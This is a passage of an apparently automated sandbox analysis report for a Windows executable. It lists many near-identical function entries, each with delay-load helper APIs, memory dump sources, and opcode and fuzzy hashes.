                                                                                                                    • Instruction Fuzzy Hash: EEB012D52DE200AC3548615A3C03C37014CE0C8B10330703EF856F0391D8407C000631
                                                                                                                    Function 00E4E1F6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: fe05063ff8a0c6e189c4ffd022515308e394569e4c59782888e7bad5a56606f4
                                                                                                                    • Instruction ID: d1ba7a9a6d83ad3af2ea9f10e65786a4e729353b97ae4287cc1d915aaf9f4d7a
                                                                                                                    • Opcode Fuzzy Hash: fe05063ff8a0c6e189c4ffd022515308e394569e4c59782888e7bad5a56606f4
                                                                                                                    • Instruction Fuzzy Hash: 1BB012D52DA100AC354862163C03C3B014CD0C9B10330F13EFC56F0380D840BC040531
                                                                                                                    Function 00E4E1D1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: 98db60dff8e3f82e8114844a1ac4553821a4670882b53f1f8021a9476eb480b9
                                                                                                                    • Instruction ID: 33f2506a6fd7a6f6ae72177c49c6c77801f238ae3a16551b3a611309a51a0637
                                                                                                                    • Opcode Fuzzy Hash: 98db60dff8e3f82e8114844a1ac4553821a4670882b53f1f8021a9476eb480b9
                                                                                                                    • Instruction Fuzzy Hash: BEB012D92DA200BC350821563C03C37010CD0C9B10330B43EFC52F0681D840BC000431
                                                                                                                    Function 00E4EAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4EAF9
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: 3Ro
                                                                                                                    • API String ID: 1269201914-1492261280
                                                                                                                    • Opcode ID: 1ec722749c1aa272699cb93cb2f326e3bf0ba02314a7c388c3c16ef6c96f2bbc
                                                                                                                    • Instruction ID: 3006eb415809d042450ca77785cb2de902e5cd1a447415663117f9addea10d8e
                                                                                                                    • Opcode Fuzzy Hash: 1ec722749c1aa272699cb93cb2f326e3bf0ba02314a7c388c3c16ef6c96f2bbc
                                                                                                                    • Instruction Fuzzy Hash: E9B012C62DA1427C3D0C72107D07C3B410CE0C0FD0330B22EF801F4181DC800C011431
                                                                                                                    Function 00E4E282 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: ff6ec8e9a37aeddcf29ffa21a7b31b92cd255ce6f3b24a94510c277c531c3d61
                                                                                                                    • Instruction ID: 03a77eeebaecee4d1029cbac96cea0f00df5891f6d7bcec3a8473edcffe0ebc9
                                                                                                                    • Opcode Fuzzy Hash: ff6ec8e9a37aeddcf29ffa21a7b31b92cd255ce6f3b24a94510c277c531c3d61
                                                                                                                    • Instruction Fuzzy Hash: 43B012E12DA100AC354861163D03C3701CCD0C8B10330703EF856F0380DC407D010531
                                                                                                                    Function 00E4E264 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: 23eebc377f7b6b5679bf11c0d4ec9c76a7ebed480520e994f48bd96e19075b70
                                                                                                                    • Instruction ID: d22111b043469868711eb2712e8a829a52204e9db7fdcd385f6e68e23d0df4c9
                                                                                                                    • Opcode Fuzzy Hash: 23eebc377f7b6b5679bf11c0d4ec9c76a7ebed480520e994f48bd96e19075b70
                                                                                                                    • Instruction Fuzzy Hash: 2FB012D12EB140AC354861163C03C3B018DE4C8B10330703EFC57F0390D8407C000531
                                                                                                                    Function 00E4E26E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: 345347902d61ae2b93fc13d6f98a03c7c0824ef8e4ac0b86640dd4d6ae9d10e2
                                                                                                                    • Instruction ID: 589bf119c146882502aeb5caf20d13d32bb6c7b8735ed326faca5ae7017cd8c2
                                                                                                                    • Opcode Fuzzy Hash: 345347902d61ae2b93fc13d6f98a03c7c0824ef8e4ac0b86640dd4d6ae9d10e2
                                                                                                                    • Instruction Fuzzy Hash: DCB012D52DA100AC354861263C03C37018CD0C9B10330B03EFC56F0380D940BC000531
                                                                                                                    Function 00E4E246 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: 3b26ef2b1a25d4e32126c59cb42460e8648bd92689e0d21bc1ff5f7d63595e8b
                                                                                                                    • Instruction ID: a5f87c659663ee43278874d4a2d6f10f105e28e5959ee81536212136111db35d
                                                                                                                    • Opcode Fuzzy Hash: 3b26ef2b1a25d4e32126c59cb42460e8648bd92689e0d21bc1ff5f7d63595e8b
                                                                                                                    • Instruction Fuzzy Hash: F1B012D52DB140AC354861163C03C37014DD0C9B10330B03EFC56F0380D840BC000531
                                                                                                                    Function 00E4E250 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: b2d7b9a5bcb2610d254a73c1f248936b0575ad1a19068a33e2779b5d9a787372
                                                                                                                    • Instruction ID: 74721b4bea3f5fa3b45723c77f08ad65b026290775fc07003200627887209f90
                                                                                                                    • Opcode Fuzzy Hash: b2d7b9a5bcb2610d254a73c1f248936b0575ad1a19068a33e2779b5d9a787372
                                                                                                                    • Instruction Fuzzy Hash: 38B012E12DB240BC358862163C03C37014DD0C8B10330713FFC56F0380D8407C440531
                                                                                                                    Function 00E4E228 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: c43cc4f8d2d75daaab5c97864c0603e489b6df2dae49117325f58868277e0815
                                                                                                                    • Instruction ID: eaa30482c825dbd5611059e4aafd76c4378ccc0964acb8939677f59b5a1d665e
                                                                                                                    • Opcode Fuzzy Hash: c43cc4f8d2d75daaab5c97864c0603e489b6df2dae49117325f58868277e0815
                                                                                                                    • Instruction Fuzzy Hash: CFB012E12DA200BC358861163C07C37014CD0C8F50330713FF856F0380D8407D400531
                                                                                                                    Function 00E4E232 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: 64e4d371445868e41cae8076b917d660b162f8624974977c22866c9c3f7ea4fb
                                                                                                                    • Instruction ID: ee93728311cbcd7b3482c1ba8818aae728fd51c12af7bd428acb5530ef7afab4
                                                                                                                    • Opcode Fuzzy Hash: 64e4d371445868e41cae8076b917d660b162f8624974977c22866c9c3f7ea4fb
                                                                                                                    • Instruction Fuzzy Hash: 4DB012E12DA100AC354861163D07C37014CD0C8F10330703EF856F0380DC407E010531
                                                                                                                    Function 00E4E23C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: dba93d929b9f63a8e00463e1565a9984c0a0efc81671e7b5a7615c33cdffcd92
                                                                                                                    • Instruction ID: 6765255a7bebcea2f68f8f6d9b8b9ac57c92ff1965c6b7305324d8b6837246dc
                                                                                                                    • Opcode Fuzzy Hash: dba93d929b9f63a8e00463e1565a9984c0a0efc81671e7b5a7615c33cdffcd92
                                                                                                                    • Instruction Fuzzy Hash: 07B012E12DA100AC354861173C07C37014CE0C8F10330703EF856F0390D8407D000531
                                                                                                                    Function 00E4E200 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: baa84c6f95c2b67d53439f27fe2d70279c49d88d6fd7018b95dc8f297ceff774
                                                                                                                    • Instruction ID: d7b6f301cf38830348c1622c7abc781fd9bfc38b6b49c73b6a3924f4d0ae39bf
                                                                                                                    • Opcode Fuzzy Hash: baa84c6f95c2b67d53439f27fe2d70279c49d88d6fd7018b95dc8f297ceff774
                                                                                                                    • Instruction Fuzzy Hash: 0FB012D13DA240BC358862163C03C3B014CD0C8B10330B23FF856F0380D8407C440531
                                                                                                                    Function 00E4E20A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: 8700e26e1beb416f942dd4dfceec3d4938dd7852b88df1ceb830b4770bb6c606
                                                                                                                    • Instruction ID: 68ed3623490c0fd99567607b399f786fac81aad3421d4f0dcd2ae1d827474411
                                                                                                                    • Opcode Fuzzy Hash: 8700e26e1beb416f942dd4dfceec3d4938dd7852b88df1ceb830b4770bb6c606
                                                                                                                    • Instruction Fuzzy Hash: 7FB012D12DE100AC354862163D03C3B014CD0C8B10330B13EF856F0380DC507D090531
                                                                                                                    Function 00E4E21E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
